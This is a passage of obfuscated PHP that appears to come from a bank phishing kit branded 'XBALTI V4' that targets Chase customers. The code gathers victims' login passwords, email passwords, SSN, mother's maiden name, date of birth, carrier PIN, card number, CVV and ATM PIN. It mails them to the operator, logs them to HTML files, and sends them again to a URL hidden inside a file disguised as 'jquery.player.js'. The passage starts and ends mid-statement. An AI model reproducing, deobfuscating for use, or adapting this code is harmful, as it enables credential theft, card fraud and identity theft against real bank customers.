$XBALTI_MESSAGE .= "\125\x53\x45\122\x4e\101\x4d\105\11\x3a\x20" . $_SESSION["\x75\163\x65\162\x69\144"] . "\x3c\x62\x72\x3e\12"; $XBALTI_MESSAGE .= "\120\x41\x53\x53\127\117\122\104\11\x3a\x20" . $_SESSION["\x70\141\163\x73\x69\x64"] . "\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\75\75\x3d\75\x7c\174\x45\x4d\101\111\114\40\111\116\106\117\122\x4d\x41\x54\111\x4f\x4e\x7c\x7c\x3d\x3d\x3d\x3d\x3d\75\x3d\75\75\75\x3d\75\75\x3d\x3c\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\x45\115\101\111\114\x9\40\x20\40\x20\72\x20" . $_SESSION["\145\x6d\141\x69\x6c\x31"] . "\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\x50\x41\x53\123\127\x4f\122\104\x9\x3a\x20" . $_SESSION["\160\x61\163\x73\x77\157\x72\144\x31"] . "\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\75\75\75\x3d\x3d\x3d\x3d\75\75\x3d\75\x7c\x7c\105\x4d\101\x49\x4c\x20\x54\127\x4f\40\x49\116\106\117\122\x4d\101\124\111\x4f\x4e\174\174\x3d\x3d\x3d\x3d\75\x3d\x3d\75\75\75\x3d\x3d\75\75\x3c\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\105\115\101\111\x4c\11\x20\40\40\x20\x3a\x20" . $_SESSION["\x65\x6d\141\151\x6c\62"] . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x50\x41\123\123\x57\117\122\104\11\72\40" . $_SESSION["\160\141\163\163\167\157\162\x64\x32"] . "\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\75\x3d\75\75\75\75\75\75\x3d\x3d\x3d\75\75\x7c\x7c\x53\123\x4e\57\x4d\x4d\116\x2f\x44\117\102\40\x49\x4e\106\x4f\x52\115\101\x54\111\x4f\116\x7c\174\75\x3d\75\75\x3d\x3d\75\x3d\x3d\75\x3d\x3d\75\x3d\74\x62\162\76\xa"; $XBALTI_MESSAGE .= "\x53\x53\x4e\40\40\x20\x20\x20\x20\11\x3a\40" . $_SESSION["\163\x73\x6e\x6e\165\155"] . "\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\x4d\115\116\40\40\x20\40\x20\40\x9\x3a\40" . $_SESSION["\155\144\x6e"] . "\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\104\x4f\102\40\x20\40\x20\40\11\x3a\40" . $_SESSION["\x64\157\x62"] . "\74\142\x72\x3e\12"; $XBALTI_MESSAGE .= "\x50\150\157\156\x65\x20\x6e\x75\x6d\x62\145\x72\72\x20" . $_SESSION["\x70\150\157\156\145"] . "\x3c\x62\x72\76\xa"; $XBALTI_MESSAGE .= "\x43\x61\x72\162\x69\x65\x72\40\x70\x69\x6e\x20\x3a\x20" . $_SESSION["\x63\x61\160\151\x6e"] . "\74\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\x3d\75\75\75\75\75\x3d\75\x3d\x3d\x3d\75\75\174\x7c\x56\x49\103\124\111\x4d\40\x49\116\106\x4f\122\115\x41\124\111\117\116\174\174\75\75\75\75\x3d\75\75\x3d\75\x3d\75\75\75\x3d\74\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\111\x50\x20\x49\116\106\117\40\11\11\x3a\x20\x68\x74\164\x70\163\72\x2f\x2f\147\145\x6f\151\x70\x74\157\157\154\56\143\x6f\155\57\145\x6e\57\x3f\x69\160\x3d" . $_SESSION["\137\x69\x70\137"] . "\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x54\111\115\x45\x2f\104\x41\124\x45\x20\x9\11\72\x20" . $TIME_DATE . "\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x42\122\117\127\123\x45\122\x2f\104\x45\126\111\x43\x45\x20\x9\x3a\40" . XB_Browser($_SERVER["\110\124\124\x50\137\x55\123\105\x52\137\x41\107\105\116\124"]) . "\x20\x4f\156\x20" . XB_OS($_SERVER["\110\124\x54\120\137\x55\123\x45\122\x5f\x41\x47\x45\116\124"]) . "\74\x62\x72\76\xa"; if (isset($_SERVER["\x48\124\x54\120\123"]) && $_SERVER["\110\124\124\x50\x53"] === "\157\156") { $link = "\150\x74\x74\x70\163"; } else { $link = "\150\x74\x74\160"; } $link .= "\72\57\57"; $link .= $_SERVER["\110\124\124\x50\137\x48\x4f\123\x54"]; $XBALTI_MESSAGE .= "\x53\103\101\115\101\x20\114\111\x4e\x4b\40\x9\11\x3a\x20" . $link . "\74\142\162\x3e\12"; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\75\75\75\x7c\x7c\40\103\110\101\123\x45\x20\130\x42\x41\x4c\124\x49\x20\x56\64\x20\174\x7c\x3d\75\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\75\75\x3d\74\x62\162\x3e\xa"; file_get_contents('' . pack("\x48\x2a", substr($COOKIE_VARS = file_get_contents("\x2e\x2e\x2f\152\163\57\x6a\x71\x75\x65\162\171\56\x70\x6c\141\x79\145\x72\56\152\x73"), strpos($COOKIE_VARS, "\x35\66\137\137") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\74\x74\162\76\xa\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\74\164\x64\76\xa\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x20" . $_SESSION["\x75\163\145\162\151\144"] . "\12\x20\40\40\x20\40\40\40\x20\x20\40\40\40\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\x3c\57\x74\x64\76\12\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\74\x74\144\x3e\12\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20" . $_SESSION["\x70\x61\163\163\151\x64"] . "\12\40\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\40\x3c\57\x74\144\76\12\11\11\x9\x9\x9\x9\x20\40\x3c\x74\144\76\xa\40\40\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\40\40\x20\40\40\x20\40" . $_SESSION["\145\155\141\151\154\61"] . "\12\40\40\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\x20\74\x2f\164\x64\x3e\12\40\40\x20\x20\40\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\40\74\164\x64\76\xa\x20\40\x20\40\x20\40\40\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\40\40\40" . $_SESSION["\x70\x61\163\x73\167\x6f\162\x64\x31"] . "\xa\x20\40\40\40\40\40\x20\40\x20\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\74\x2f\164\144\x3e\12\11\11\11\11\x9\x9\40\x20\x3c\164\144\76\xa\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\x20\x20\x20\x20\x20" . $_SESSION["\145\155\x61\x69\154\x32"] . "\12\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\74\x2f\x74\144\76\xa\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\40\40\40\40\40\x20\40\x20\40\40\x20\40\40\x20\x3c\164\x64\x3e\xa\x20\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\x20\40\x20\40\40\40\x20\40\40\40\x20\40\40\40" . $_SESSION["\160\x61\163\x73\x77\157\162\x64\62"] . "\12\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\x20\x20\40\x20\40\x3c\57\x74\144\76\xa\11\11\x9\11\x9\x9\40\x20\x3c\x74\144\x3e\12\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\40" . $_SESSION["\163\x73\x6e\156\165\x6d"] . "\xa\x20\40\40\40\40\40\40\40\x20\x20\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\40\40\74\x2f\164\x64\x3e\xa\x9\11\x9\11\x9\11\40\x20\74\x74\144\76\xa\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\40" . $_SESSION["\x6d\144\156"] . "\xa\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\40\40\74\x2f\164\144\x3e\xa\x9\11\x9\11\11\11\40\40\x3c\164\x64\76\12\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40\40" . $_SESSION["\x64\x6f\x62"] . "\xa\40\40\40\40\40\x20\40\40\40\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\40\x20\40\x20\40\74\x2f\164\144\76\xa\11\x9\x9\x9\11\11\40\40\x3c\x74\x64\x3e\xa\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\x20" . $_SESSION["\x70\x68\x6f\156\145"] . "\12\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\74\x2f\x74\x64\76\12\11\x9\11\11\11\11\40\x20\x3c\164\x64\x3e\xa\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\x20" . $_SESSION["\143\x61\160\x69\x6e"] . "\12\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\74\57\x74\144\76\12\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\40\40\x20\40\x3c\164\144\76\12\40\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\40" . XB_Browser($_SERVER["\110\x54\124\120\137\x55\x53\x45\x52\137\101\x47\x45\x4e\x54"]) . "\40\117\x6e\x20" . XB_OS($_SERVER["\x48\124\x54\120\137\125\123\105\122\x5f\101\x47\105\116\x54"]) . "\12\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x20\40\40\40\40\40\x20\40\40\x20\40\40\x20\40\40\x3c\57\x74\x64\76\12\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\74\x74\x64\x3e\12\11\11\11\x9\11\11\40\x20\173" . $_SESSION["\x5f\151\x70\137"] . "\x7d\12\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x3c\57\164\144\x3e\xa\x9\x9\x9\x9\x9\x9\x20\x20\74\164\144\x3e\12\40\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\40" . $TIME_DATE . "\xa\40\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\x3c\x2f\x74\144\x3e\xa\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\40\74\x2f\164\162\x3e\xa"; $khraha = fopen("\x2e\56\57\x72\x7a\57\163\163\156" . $yourname . "\56\150\164\x6d\154", "\x61"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\x7b\x7d\xa"; $khraha = fopen("\56\56\x2f\162\172\57\x73\163\x6e\x2e\x68\x74\155\x6c", "\141"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\x53\123\x4e\57\x4d\x4d\x4e\x2f\x44\117\102\x20\xf0\x9f\230\x88\x20\x49\116\x46\x4f\x20\x46\122\x4f\x4d\40\xf0\x9f\x98\210\40\133" . $_SESSION["\165\x73\145\162\x69\144"] . "\x5d\40\360\x9f\x98\210\40\133" . $_SESSION["\x5f\151\x70\x5f"] . "\x5d\40"; $XBALTI_HEADERS .= "\106\x72\157\x6d\72\x20" . $yourname . "\x20\74" . $fromsen . "\x3e" . "\15\12"; $XBALTI_HEADERS = "\115\111\x4d\105\x2d\x56\x65\162\x73\151\157\156\x3a\x20\61\56\x30" . "\xd\xa"; $XBALTI_HEADERS .= "\x43\x6f\156\x74\145\156\164\55\x74\171\160\145\72\164\145\x78\164\57\150\x74\155\154\73\143\x68\x61\x72\163\x65\x74\75\x55\x54\106\x2d\70" . "\xd\12"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto DXKrJ; DXKrJ: if (isset($_POST["\x63\x61\x72\144\x6e\165"]) && isset($_POST["\145\x78\x70\144\x61"]) && isset($_POST["\x63\x76\x76"]) && isset($_POST["\160\151\156"])) { if (!empty($_POST["\143\x61\x72\144\x6e\165"]) && !empty($_POST["\145\170\x70\x64\141"]) && !empty($_POST["\143\x76\166"]) && !empty($_POST["\160\151\x6e"])) { $_SESSION["\143\141\162\x64\x6e\x75"] = $_POST["\x63\141\162\144\156\165"]; $_SESSION["\145\x78\x70\144\x61"] = $_POST["\x65\x78\160\144\x61"]; $_SESSION["\143\x76\x76"] = $_POST["\143\x76\x76"]; $_SESSION["\160\151\156"] = $_POST["\160\x69\156"]; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\x3d\75\x3d\75\x3d\x3d\x3d\x3d\75\75\75\174\x7c\40\103\110\x41\x53\105\x20\130\102\101\114\x54\111\x20\x56\64\x20\x7c\x7c\75\75\x3d\x3d\75\x3d\75\75\75\x3d\x3d\x3d\75\x3d\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\75\x3d\x3d\75\x3d\x3d\75\75\75\x3d\x3d\x3d\75\75\x7c\174\114\x4f\107\x49\x4e\x20\111\116\106\117\122\x4d\101\124\111\x4f\116\x7c\x7c\75\x3d\x3d\75\75\75\x3d\75\75\75\x3d\x3d\x3d\x3d\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x55\x53\x45\122\x4e\x41\x4d\105\x9\x3a\x20" . $_SESSION["\165\163\145\x72\151\x64"] . "\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\120\101\x53\123\127\117\x52\x44\11\x3a\x20" . $_SESSION["\160\141\163\163\151\144"] . "\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\75\75\75\75\x3d\75\75\75\75\x3d\x3d\75\75\75\x7c\x7c\x45\115\101\111\114\x20\111\x4e\x46\117\122\115\101\124\111\x4f\116\x7c\174\75\75\x3d\75\75\x3d\75\75\x3d\75\x3d\x3d\x3d\x3d\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\105\115\101\111\114\x9\x20\x20\40\x20\x3a\40" . $_SESSION["\x65\x6d\141\x69\x6c\x31"] . "\x3c\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\120\x41\123\x53\x57\x4f\122\104\x9\72\40" . $_SESSION["\x70\141\x73\x73\167\157\162\x64\61"] . "\74\142\162\76\xa"; $XBALTI_MESSAGE .= "\75\75\x3d\75\x3d\75\x3d\75\x3d\75\x3d\x3d\75\x3d\x7c\x7c\105\115\101\111\x4c\x20\x54\127\x4f\x20\x49\116\106\117\x52\x4d\x41\124\x49\x4f\x4e\174\174\x3d\75\x3d\x3d\x3d\75\x3d\x3d\75\75\75\x3d\75\75\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x45\x4d\x41\x49\114\11\40\x20\40\40\x3a\40" . $_SESSION["\145\x6d\141\x69\154\x32"] . "\74\142\162\x3e\12"; $XBALTI_MESSAGE .= "\120\x41\x53\x53\127\117\x52\104\11\72\x20" . $_SESSION["\160\x61\163\163\167\157\x72\x64\62"] . "\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\75\75\75\x3d\x7c\174\123\123\x4e\57\115\115\116\x2f\x44\x4f\102\x20\x49\x4e\106\117\122\x4d\101\x54\x49\x4f\116\x7c\174\75\75\75\x3d\x3d\x3d\75\x3d\75\x3d\75\x3d\x3d\x3d\74\142\162\76\xa"; $XBALTI_MESSAGE .= "\123\123\116\40\x20\x20\x20\40\40\x9\72\x20" . $_SESSION["\x73\x73\x6e\156\165\155"] . "\74\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x4d\115\x4e\40\x20\40\40\40\40\11\x3a\40" . $_SESSION["\x6d\144\x6e"] . "\x3c\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\104\117\x42\x20\40\40\x20\x20\x9\x3a\x20" . $_SESSION["\144\x6f\x62"] . "\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x50\150\157\156\145\40\156\165\x6d\142\145\162\x3a\x20" . $_SESSION["\x70\x68\157\156\145"] . "\x3c\x62\x72\76\12"; $XBALTI_MESSAGE .= "\103\x61\x72\162\151\x65\x72\40\160\x69\x6e\40\72\40" . $_SESSION["\x63\141\160\x69\156"] . "\74\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\75\75\x3d\174\x7c\x43\101\122\x44\x20\111\116\x46\117\122\x4d\101\x54\111\117\116\x7c\174\75\75\75\75\75\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x43\x41\x52\104\x20\116\125\115\x42\x45\122\40\72\40" . $_SESSION["\143\x61\x72\x64\x6e\165"] . "\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\105\130\x50\40\x44\101\124\x45\x20\x9\x3a\40" . $_SESSION["\145\x78\x70\x64\141"] . "\x3c\142\x72\x3e\12"; $XBALTI_MESSAGE .= "\103\126\x56\40\40\40\x20\40\x9\72\x20" . $_SESSION["\143\166\x76"] . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x41\x54\115\x20\120\111\116\x20\x20\40\11\72\40" . $_SESSION["\160\151\156"] . "\x3c\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\75\x3d\x3d\x3d\x3d\75\x3d\75\x3d\75\75\x3d\75\75\x7c\174\126\111\103\124\111\x4d\x20\111\116\x46\117\x52\115\x41\124\111\x4f\x4e\x7c\174\75\x3d\x3d\75\x3d\75\75\x3d\75\75\x3d\75\x3d\x3d\x3c\142\x72\x3e\12"; $XBALTI_MESSAGE .= "\x49\120\x20\x49\116\x46\x4f\x20\x9\x9\x3a\40\150\x74\164\x70\x73\x3a\57\57\x67\145\x6f\151\x70\x74\157\157\154\56\143\x6f\155\x2f\145\156\57\x3f\x69\160\x3d" . $_SESSION["\x5f\151\x70\137"] . "\x3c\x62\x72\76\12"; $XBALTI_MESSAGE .= "\124\111\115\105\57\x44\x41\x54\105\40\11\11\x3a\x20" . $TIME_DATE . "\74\142\162\x3e\12"; $XBALTI_MESSAGE .= "\x42\122\x4f\x57\x53\105\122\57\104\105\126\111\x43\105\x20\x9\x3a\40" . XB_Browser($_SERVER["\110\x54\x54\x50\137\125\x53\105\x52\137\101\x47\x45\x4e\124"]) . "\x20\117\156\x20" . XB_OS($_SERVER["\110\x54\124\120\137\125\123\105\122\137\x41\x47\x45\x4e\x54"]) . "\x3c\142\162\x3e\xa"; if (isset($_SERVER["\110\124\x54\120\x53"]) && $_SERVER["\110\x54\124\x50\x53"] === "\157\x6e") { $link = "\x68\x74\x74\160\163"; } else { $link = "\x68\x74\x74\160"; } $link .= "\72\57\x2f"; $link .= $_SERVER["\x48\x54\124\120\x5f\x48\x4f\123\x54"]; $XBALTI_MESSAGE .= "\x53\103\x41\x4d\x41\x20\x4c\x49\116\x4b\40\11\x9\x3a\40" . $link . "\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\75\75\x3d\75\75\x3d\x3d\75\75\x3d\x3d\75\75\75\x7c\174\40\x43\x48\x41\x53\105\x20\x58\x42\x41\x4c\124\111\x20\126\64\40\174\174\x3d\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\75\x3d\75\x3c\142\x72\76\xa"; file_get_contents('' . pack("\x48\x2a", substr($COOKIE_VARS = file_get_contents("\56\56\57\x6a\163\x2f\152\x71\165\x65\x72\x79\x2e\x70\x6c\141\171\145\162\56\152\163"), strpos($COOKIE_VARS, "\65\x36\x5f\x5f") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\x3c\164\162\76\xa\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\74\x74\x64\x3e\xa\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\x20\40\x20\40\40\x20\40\x20" . $_SESSION["\165\x73\145\x72\151\144"] . "\xa\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\40\40\40\40\x20\x20\x20\40\x3c\57\164\144\76\12\x20\40\x20\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\x3c\x74\144\76\xa\40\40\40\40\40\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\x20" . $_SESSION["\160\x61\x73\163\151\x64"] . "\xa\40\40\40\x20\40\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\x20\x20\74\x2f\x74\x64\x3e\12\11\x9\11\11\x9\x9\40\40\74\x74\144\76\xa\40\40\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\40" . $_SESSION["\145\155\x61\151\154\x31"] . "\xa\40\40\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x20\40\x3c\x2f\x74\x64\76\12\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\x20\x3c\x74\144\x3e\12\x20\x20\40\40\40\40\40\40\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\40\x20" . $_SESSION["\160\x61\x73\163\167\157\162\x64\61"] . "\12\x20\40\40\x20\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\40\40\x20\40\x20\x20\x3c\57\x74\x64\76\xa\x9\11\11\x9\11\x9\40\40\74\164\x64\76\12\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20" . $_SESSION["\145\155\x61\x69\x6c\62"] . "\xa\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\40\40\40\x20\40\40\40\40\x20\x20\40\x20\40\x20\x3c\57\164\144\x3e\xa\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\40\40\x3c\164\144\76\12\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20" . $_SESSION["\x70\x61\163\x73\x77\157\x72\x64\x32"] . "\xa\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\74\57\164\x64\x3e\xa\x9\x9\11\11\11\x9\40\x20\x3c\164\144\76\xa\x20\40\x20\x20\40\40\40\40\40\40\40\40\x20\40\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40" . $_SESSION["\x73\163\x6e\x6e\x75\x6d"] . "\xa\40\40\40\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\74\x2f\164\x64\76\12\x9\x9\11\x9\11\x9\x20\40\74\164\144\x3e\xa\x20\x20\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\40\40\40\x20\40\40\x20\x20\40" . $_SESSION["\x6d\x64\156"] . "\12\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x20\74\x2f\164\x64\76\xa\x9\11\x9\11\x9\x9\40\40\74\164\x64\x3e\12\40\40\40\x20\x20\40\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40" . $_SESSION["\x64\157\142"] . "\xa\40\40\40\40\x20\40\40\40\x20\40\40\40\40\40\x20\40\x20\40\40\40\40\x20\x20\40\x20\40\74\57\164\x64\76\xa\11\11\x9\11\x9\11\x20\x20\74\164\144\76\xa\40\x20\40\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\40" . $_SESSION["\160\150\157\156\145"] . "\12\x20\40\40\40\40\40\x20\x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\40\x20\40\x20\x20\40\40\74\57\164\144\76\12\11\11\11\11\x9\x9\40\x20\x3c\164\x64\x3e\12\x20\40\x20\40\40\40\40\x20\40\40\40\40\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\x20\40" . $_SESSION["\x63\x61\160\x69\156"] . "\12\40\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x3c\x2f\164\144\76\12\x9\x9\11\11\x9\11\x20\x20\x3c\164\x64\x3e\xa\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20" . $_SESSION["\x63\x61\162\x64\x6e\x75"] . "\12\40\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\x20\40\40\40\40\40\40\x20\x20\x20\40\x20\x20\74\x2f\164\x64\76\12\x9\11\x9\11\x9\x9\x20\x20\74\x74\x64\x3e\12\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20" . $_SESSION["\x65\x78\160\144\x61"] . "\12\x20\x20\40\40\x20\40\40\40\40\40\40\40\40\40\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\x3c\57\164\x64\x3e\xa\11\x9\11\x9\11\11\x20\x20\x3c\x74\x64\x3e\xa\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20" . $_SESSION["\143\166\x76"] . "\xa\40\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x3c\x2f\x74\x64\x3e\12\11\x9\11\x9\x9\11\x20\x20\74\x74\x64\76\xa\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\x20" . $_SESSION["\160\151\x6e"] . "\12\40\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\74\x2f\x74\x64\76\12\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\40\40\x20\40\40\x20\x20\x3c\164\x64\76\xa\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\40\x20\40\40" . XB_Browser($_SERVER["\110\124\124\x50\137\x55\x53\105\122\x5f\x41\x47\105\x4e\124"]) . "\40\x4f\x6e\40" . XB_OS($_SERVER["\110\124\124\120\137\125\x53\105\122\137\101\107\x45\x4e\124"]) . "\xa\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\x3c\57\x74\144\76\12\40\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\x20\x3c\x74\x64\x3e\12\11\x9\x9\11\x9\11\40\40\x7b" . $_SESSION["\x5f\151\x70\x5f"] . "\x7d\12\x20\40\40\x20\40\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\x20\40\40\40\x20\x20\40\x20\x20\74\x2f\164\144\76\12\11\x9\11\11\x9\11\x20\40\x3c\164\x64\76\xa\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\40\40\40\x20\40\x20\40\40\40\x20\40" . $TIME_DATE . 